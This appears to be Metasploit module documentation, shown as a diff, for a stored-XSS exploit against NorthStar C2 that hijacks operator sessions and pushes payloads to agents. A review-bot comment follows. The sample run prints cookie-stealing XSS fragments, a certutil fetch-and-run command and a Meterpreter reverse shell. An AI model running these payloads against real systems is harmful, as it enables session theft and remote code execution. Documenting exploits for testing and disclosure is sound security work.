| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +NorthStar C2, prior to commit `7674a44` on March 11 2024, contains a vulnerability where the logs page is |
| 4 | +vulnerable to a stored XSS. |
| 5 | +An unauthenticated user can simulate an agent registration to cause the XSS and take over a user's session. |
| 6 | +With this access, it is then possible to run a new payload on all of the NorthStar C2 compromised hosts |
| 7 | +(agents), and kill the original agent. |
| 8 | + |
| 9 | +Successfully tested against NorthStar C2 commit `e7fdce148b6a81516e8aa5e5e037acd082611f73` running on |
| 10 | +Ubuntu 22.04. The agent was running on Windows 10 19045. |
| 11 | + |
| 12 | +```mermaid |
| 13 | +flowchart TD |
| 14 | + A(fa:fa-computer Metasploit) |
| 15 | + B(fa:fa-server NorthStar C2) |
| 16 | + C(fa:fa-person Northstar C2 User) |
| 17 | + D(fa:fa-bug Agent) |
| 18 | + A -->|1. Upload XSS| B |
| 19 | + B -...-> C |
| 20 | + C -->|2. Visit XSS Page| B |
| 21 | + C -->|3. Send cookie| A |
| 22 | + A -->|4. Using Cookie, takeover agents| B |
| 23 | + D -->|5. Fetch and run payload, kill agent| A |
| 24 | + D -...-> B |
| 25 | + B -...-> D |
| 26 | +``` |
| 27 | + |
| 28 | +### Install NorthStar C2 |
| 29 | + |
| 30 | +Instructions for Ubuntu 22.04. Official documentation and manual installation steps can be found [here](https://github.com/EnginDemirbilek/NorthStarC2/wiki/Installation). |
| 31 | + |
| 32 | +``` |
| 33 | +sudo apt-get update |
| 34 | +sudo apt-get install -y software-properties-common git wget mysql-server |
| 35 | +sudo add-apt-repository ppa:ondrej/php |
| 36 | +sudo apt-get update |
| 37 | +sudo service mysql start |
| 38 | +git clone https://github.com/EnginDemirbilek/NorthStarC2.git |
| 39 | +cd NorthStarC2 |
| 40 | +git checkout e7fdce148b6a81516e8aa5e5e037acd082611f73 |
| 41 | +chmod +x install.sh |
| 42 | +sudo ./install.sh # mysql answers: root:<empty>, make sure to give a website username/password |
| 43 | +sudo apt-get purge -y php |
| 44 | +sudo apt autoremove -y |
| 45 | +sudo apt-get install -y php7.2 libapache2-mod-php7.2 php7.2-mysql |
| 46 | +sudo a2dismod php* |
| 47 | +sudo a2enmod php7.2 |
| 48 | +sudo service apache2 restart |
| 49 | +``` |
| 50 | + |
| 51 | +### Agent Install |
| 52 | + |
| 53 | +This should be done on a Windows computer: |
| 54 | + |
| 55 | +On the c2 payload, you'll want to edit `Program.cs` on line 13 and edit `mainUri` to your northstar IP. |
| 56 | +Now run the program, or compile and run it, and ensure the agent is active on the NorthStar C2 website. |
| 57 | + |
| 58 | +## Verification Steps |
| 59 | + |
| 60 | +1. Install the application, and connect an agent |
| 61 | +1. Start msfconsole |
| 62 | +1. Do: `use exploit/windows/http/northstar_c2_xss_to_agent_rce` |
| 63 | +1. Do: `set rhosts [ip]` |
| 64 | +1. Do: `set srvhost [srvhost]` |
| 65 | +1. Do: `set fetch_srvport [fetch_srvport]` |
| 66 | +1. Do: `set fetch_srvhost [fetch_srvhost]` |
| 67 | +1. Do: `run` |
| 68 | +1. Do: visit the NorthStarC2 site with a logged in user, and browse to the Server Logs page. |
| 69 | +1. You should get a shell on each agent. |
| 70 | + |
| 71 | +## Options |
| 72 | + |
| 73 | +### KILL |
| 74 | + |
| 75 | +If the NorthStarC2 agent should be explicitly killed on each compromised host. Defaults to `false` |
| 76 | + |
| 77 | +## Scenarios |
| 78 | + |
| 79 | +### NorthStar C2 commit e7fdce148b6a81516e8aa5e5e037acd082611f73 on Ubuntu 22.04 with an agent on Windows 10 |
| 80 | + |
| 81 | +``` |
| 82 | +resource (northstar.rq)> use exploit/windows/http/northstar_c2_xss_to_agent_rce |
| 83 | +[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp |
| 84 | +resource (northstar.rq)> set rhosts 4.4.4.4 |
| 85 | +rhosts => 4.4.4.4 |
| 86 | +resource (northstar.rq)> set srvhost 3.3.3.3 |
| 87 | +srvhost => 3.3.3.3 |
| 88 | +resource (northstar.rq)> set verbose true |
| 89 | +verbose => true |
| 90 | +resource (northstar.rq)> set FETCH_SRVPORT 9090 |
| 91 | +FETCH_SRVPORT => 9090 |
| 92 | +resource (northstar.rq)> set FETCH_srvhost 3.3.3.3 |
| 93 | +FETCH_srvhost => 3.3.3.3 |
| 94 | +msf6 exploit(windows/http/northstar_c2_xss_to_agent_rce) > exploit |
| 95 | +[*] Command to run on remote host: certutil -urlcache -f http://3.3.3.3:9090/p3icRkNmQwbsIs7RYzV5sA %TEMP%\tKvCAnUBZgfn.exe & start /B %TEMP%\tKvCAnUBZgfn.exe |
| 96 | +[*] Exploit running as background job 0. |
| 97 | +[*] Exploit completed, but no session was created. |
| 98 | +msf6 exploit(windows/http/northstar_c2_xss_to_agent_rce) > |
| 99 | +[*] Fetch handler listening on 3.3.3.3:9090 |
| 100 | +[*] HTTP server started |
| 101 | +[*] Adding resource /p3icRkNmQwbsIs7RYzV5sA |
| 102 | +[*] Started reverse TCP handler on 3.3.3.3:4444 |
| 103 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 104 | +[!] The service is running, but could not be validated. NorthStar Login page detected |
| 105 | +[*] Sending XSS |
| 106 | +[*] Sending: N*/</script><q |
| 107 | +[*] Sending: N*/i.src=u/*q |
| 108 | +[*] Sending: N*/new Image;/*q |
| 109 | +[*] Sending: N*/var i=/*q |
| 110 | +[*] Sending: N*/s+h+p+'/'+c;/*q |
| 111 | +[*] Sending: N*/var u=/*q |
| 112 | +[*] Sending: N*/'http://';/*q |
| 113 | +[*] Sending: N*/var s=/*q |
| 114 | +[*] Sending: N*/':8080';/*q |
| 115 | +[*] Sending: N*/var p=/*q |
| 116 | +[*] Sending: N*/a+b;/*q |
| 117 | +[*] Sending: N*/var h=/*q |
| 118 | +[*] Sending: N*/'.10.147';/*q |
| 119 | +[*] Sending: N*/var b=/*q |
| 120 | +[*] Sending: N*/'192.168';/*q |
| 121 | +[*] Sending: N*/var a=/*q |
| 122 | +[*] Sending: N*/d.cookie;/*q |
| 123 | +[*] Sending: N*/var c=/*q |
| 124 | +[*] Sending: N*/document;/*q |
| 125 | +[*] Sending: N*/var d=/*q |
| 126 | +[*] Sending: N</td><script>/*q |
| 127 | +[*] Waiting on XSS execution |
| 128 | +[*] Using URL: http://3.3.3.3:8080/ |
| 129 | +[*] Server started. |
| 130 | +``` |
| 131 | + |
| 132 | +Now visit the site with a logged in user, and browse to the Server Logs page. |
| 133 | + |
| 134 | +``` |
| 135 | +[*] 1.1.1.1 northstar_c2_xss_to_agent_rce - Received GET request. |
| 136 | +[+] 1.1.1.1 northstar_c2_xss_to_agent_rce - Received cookie: st0sfhqto9mqtpd81rlg6hq5g5 |
| 137 | +[+] 1.1.1.1 northstar_c2_xss_to_agent_rce - Live Agents |
| 138 | +=========== |
| 139 | + ID IP OS Username Hostname Status |
| 140 | + -- -- -- -------- -------- ------ |
| 141 | + NC1S7X834eJVcJtynrq 222.222.22.222 Windows 10 Enterprise DESKTOP-Q0HUOEI\h00die DESKTOP-Q0HUOEI Online |
| 142 | +[+] 1.1.1.1 northstar_c2_xss_to_agent_rce - CSRF Token: 38b4d324e8cd233b7a94c62e7b3c5556 |
| 143 | +[*] 1.1.1.1 northstar_c2_xss_to_agent_rce - (NC1S7X834eJVcJtynrq) Stealing DESKTOP-Q0HUOEI |
| 144 | +[*] 1.1.1.1 northstar_c2_xss_to_agent_rce - (NC1S7X834eJVcJtynrq) Enabling shell mode |
| 145 | +[+] 1.1.1.1 northstar_c2_xss_to_agent_rce - Command sent successfully to agent NC1S7X834eJVcJtynrq, response: Cmd mode enabled, all commands will be redirect to CMD. Response delay is : 2000 miliseconds |
| 146 | +[*] 1.1.1.1 northstar_c2_xss_to_agent_rce - (NC1S7X834eJVcJtynrq) Running payload |
| 147 | +[*] Client 222.222.22.222 requested /p3icRkNmQwbsIs7RYzV5sA |
| 148 | +[*] Sending payload to 222.222.22.222 (Microsoft-CryptoAPI/10.0) |
| 149 | +[*] Client 222.222.22.222 requested /p3icRkNmQwbsIs7RYzV5sA |
| 150 | +[*] Sending payload to 222.222.22.222 (CertUtil URL Agent) |
| 151 | +[*] Sending stage (201798 bytes) to 222.222.22.222 |
| 152 | +[*] Meterpreter session 1 opened (3.3.3.3:4444 -> 222.222.22.222:50116) at 2024-04-10 14:40:31 +0000 |
| 153 | +msf6 exploit(windows/http/northstar_c2_xss_to_agent_rce) > sessions -i 1 |
| 154 | +[*] Starting interaction with 1... |
| 155 | +meterpreter > sysinfo |
| 156 | +Computer : DESKTOP-Q0HUOEI |
| 157 | +OS : Windows 10 (10.0 Build 19045). |
| 158 | +Architecture : x64 |
| 159 | +System Language : en_US |
| 160 | +Domain : WORKGROUP |
| 161 | +Logged On Users : 2 |
| 162 | +Meterpreter : x64/window |
| 163 | +``` |
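Review bot: the redaction in the Scenarios output is inconsistent: SRVHOST is shown as `3.3.3.3` (`set srvhost 3.3.3.3`, `Using URL: http://3.3.3.3:8080/`), but the `[*] Sending:` fragments of the XSS payload still carry the original address pieces (`'192.168'`, `'.10.147'`, `':8080'`), so the documented run does not match itself; either redact those fragments to the same placeholder or leave the real SRVHOST in both places. Also in the Options section, "If the NorthStarC2 agent should be explicitly killed on each compromised host." is a sentence fragment; "Whether the NorthStar C2 agent should be explicitly killed on each compromised host. Defaults to `false`." reads as a proper description. In Agent Install, pointing at "`Program.cs` on line 13" will go stale as the upstream file changes; referencing only the `mainUri` variable is enough. Minor: the product name is spelled "NorthStar C2", "Northstar C2" (mermaid node C) and "NorthStarC2" in the same file; pick one spelling for prose and keep the repository name for paths and URLs.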